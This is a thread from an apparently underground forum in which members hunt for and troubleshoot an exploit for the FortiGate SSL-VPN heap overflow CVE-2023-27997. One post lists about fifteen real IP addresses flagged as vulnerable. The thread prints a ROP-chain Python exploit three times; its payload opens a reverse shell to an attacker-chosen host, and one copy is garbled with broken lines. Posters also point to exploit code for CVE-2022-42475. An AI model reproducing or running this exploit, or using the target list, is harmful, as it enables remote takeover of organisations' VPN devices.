FortiOS & FortiProxy - Heap buffer overflow in sslvpn pre-authentication

[владимиродин]

Summary​

We are actively monitoring CVE-2023-27997, a critical vulnerability affecting FortiGate SSL-VPN appliances. Exploitation of this vulnerability could result in remote code execution (RCE). This vulnerability patch was discovered by a French cybersecurity company, Olympe Cyberdefense; an advisory from Fortinet has not been released yet. FortiOS versions 7.0.12, 7.2.5, 6.4.13, and 6.2.15 contain the patch.

https://www.reddit . com/r/msp/comments/147t4cp/our_soc_is_actively_monitoring_cve202327997_a/
https://twitter . com/cfreal_/status/1667852157536616451

 

[greywraith]

The researcher has published some exploit information but only for a crash.

Xortigate, or CVE-2023-27997 - The Rumoured RCE That Was

When Lexfo Security teased a critical pre-authentication RCE bug in FortiGate devices on Saturday 10th, many people speculated on the practical impact of the bug. Would this be a true, sky-is-falling level vulnerability like the recent CVE-2022-42475? Or was it some edge-case hole, requiring...

labs.watchtowr.com

 

[BadMonkey]

ANy updates on the PoC ?

 

[владимиродин]

ANy updates on the PoC ?

думаю еще нет

 

[Agaspherus]

Проверил несколько устройств на эту уязвимость, но сейчас лень этим заниматься. Может кому то пригодится:
Checking https://50.237.110.82:443
Vulnerable

Checking https://208.186.31.170:444
Vulnerable

Checking https://98.179.241.44:4433
Vulnerable
(venv)

Checking https://184.177.112.114:10443
Vulnerable

Checking https://74.62.224.178:443
WARNING: Low confidence results.
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://193.252.213.5:10443
Vulnerable

Checking https://37.18.166.107:10443
Vulnerable

Checking https://84.14.220.188:443
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://90.115.101.105:10443
Vulnerable

Checking https://78.94.232.219:4443
Vulnerable

Checking https://46.24.200.225:10443
WARNING: Low confidence results.
Vulnerable

Checking https://93.41.218.228:443
Vulnerable

Checking https://93.149.28.122:8443
WARNING: Low confidence results.
Vulnerable

 

[ivan231]

Summary​

We are actively monitoring CVE-2023-27997, a critical vulnerability affecting FortiGate SSL-VPN appliances. Exploitation of this vulnerability could result in remote code execution (RCE). This vulnerability patch was discovered by a French cybersecurity company, Olympe Cyberdefense; an advisory from Fortinet has not been released yet. FortiOS versions 7.0.12, 7.2.5, 6.4.13, and 6.2.15 contain the patch.

https://www.reddit . com/r/msp/comments/147t4cp/our_soc_is_actively_monitoring_cve202327997_a/
https://twitter . com/cfreal_/status/1667852157536616451

a patch has been released for it but still lots of machines are in danger. what's your newest update about this?

 

[ivan231]

I checked several devices for this vulnerability, but now I'm too lazy to do it. Might be useful for someone:
Checking https://50.237.110.82:443
Vulnerable

Checking https://208.186.31.170:444
Vulnerable

Checking https://98.179.241.44:4433
Vulnerable
(venv)

Checking https://184.177.112.114:10443
Vulnerable

Checking https://74.62.224.178:443
WARNING: Low confidence results.
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://193.252.213.5:10443
Vulnerable

Checking https://37.18.166.107:10443
Vulnerable

Checking https://84.14.220.188:443
Vulnerable

Checking https://84.14.220.190:443
Vulnerable

Checking https://90.115.101.105:10443
Vulnerable

Checking https://78.94.232.219:4443
Vulnerable

Checking https://46.24.200.225:10443
WARNING: Low confidence results.
Vulnerable

Checking https://93.41.218.228:443
Vulnerable

Checking https://93.149.28.122:8443
WARNING: Low confidence results.
Vulnerable

so you have tried penetrating them with the exploit, is that so?

 

[владимиродин]

но сейчас лень этим заниматься

ну конечно ты молодец )

Проверил несколько устройств на эту уязвимость

подскажите пожалуйста какой эксплойт

 

[ivan231]

Well, of course you're great)

please tell me which exploit

wd you tell me about cve-2023-27997? i'm lookisearching for that

 

[Sec13B]

/home/kali/Desktop/44343/n/fo1.py:8: DeprecationWarning: ssl.SSLContext() without protocol argument is deprecated.
  context = ssl.SSLContext()
/home/kali/Desktop/44343/n/fo1.py:8: DeprecationWarning: ssl.PROTOCOL_TLS is deprecated
  context = ssl.SSLContext()
Exception occurred :TypeError("can't concat str to bytes")

in kali with
└─$ python -V
Python 3.11.2

 

[pepel]

tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host.encode() +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload # i'm fuckn skidie

 

[Sec13B]

pepel , what encode asci,utf-8, ?
testing your modify line , and didn't work.

head cve.py | tail -2

target_host = sys.argv[1].encode()
target_port = sys.argv[2].encode()

1. What Python version
2. What OS Version
   to run this python script?

import socket
import ssl
from pwn import *
import time
import sys
import requests

context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"

#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1



#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000

scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)

ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""

try:
    with socket.create_connection((target_host, int(target_port,10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            context.verify_mode = ssl.CERT_NONE
            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
            ssock.sendall(tosend)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :"+ repr(e))

 

[pepel]

target_host.encode() and all works fine. Other messages with DeprecationWarning just warnings. you can disable them by adding at the beginning of file

import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)

Python 3.11
OS any

 

[ivan231]

pepel , what encode asci,utf-8, ?
testing your modify line , and didn't work.

head cve.py | tail -2

target_host = sys.argv[1].encode()
target_port = sys.argv[2].encode()

1. What Python version
2. What OS Version
   to run this python script?

import socket
import ssl
from pwn import *
import time
import sys
import requests

context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"

#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1



#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000

scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)

ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropechain += bust
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""

try:
    with socket.create_connection((target_host, int(target_port,10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            context.verify_mode = ssl.CERT_NONE
            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
            ssock.sendall(roaring)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :"+ repr(e))

hey man, have you tested the exploit successfully?

 

[pepel]

No, i'm too lazy for that

 

[stderr]

No, i'm too lazy for that

Hahaha.

 

[владимиродин]

pepel , what encode asci,utf-8, ?
testing your modify line , and didn't work.

head cve.py | tail -2

target_host = sys.argv[1].encode()
target_port = sys.argv[2].encode()

1. What Python version
2. What OS Version
   to run this python script?

import socket
import ssl
from pwn import *
import time
import sys
import requests

context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
    strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"

#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1



#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000

scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)

ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""

try:
    with socket.create_connection((target_host, int(target_port,10))) as sock:
        with context.wrap_socket(sock, server_hostname=target_host) as ssock:
            ssock.settimeout(2)
            context.verify_mode = ssl.CERT_NONE
            payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
            tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
            ssock.sendall(tosend)
            r = ssock.recv(10024)
except Exception as e:
    print("Exception occurred :"+ repr(e))

cve-2022-42475 експлойт код

ivan231 https://github.com/Amir-hy/cve-2022-42475/blob/main/cve-2022-42475.py конечно не работает )

 

[pepel]

cve-2022-42475 експлойт код

ivan231 https://github.com/Amir-hy/cve-2022-42475/blob/main/cve-2022-42475.py конечно не работает )

/threads/83850/#post-599256 so fuckn stupid skidies

 

[ivan231]

The researcher has published some exploit information but only for a crash.

Xortigate, or CVE-2023-27997 - The Rumoured RCE That Was

When Lexfo Security teased a critical pre-authentication RCE bug in FortiGate devices on Saturday 10th, many people speculated on the practical impact of the bug. Would this be a true, sky-is-falling level vulnerability like the recent CVE-2022-42475? Or was it some edge-case hole, requiring...

labs.watchtowr.com

yeah not the complete code i'm also looking for the mysterious guy who has the exploit. Lol

 

[ivan231]

No, I'm too lazy for that

give it a try bro, i wanna see how it exploits the damn thing.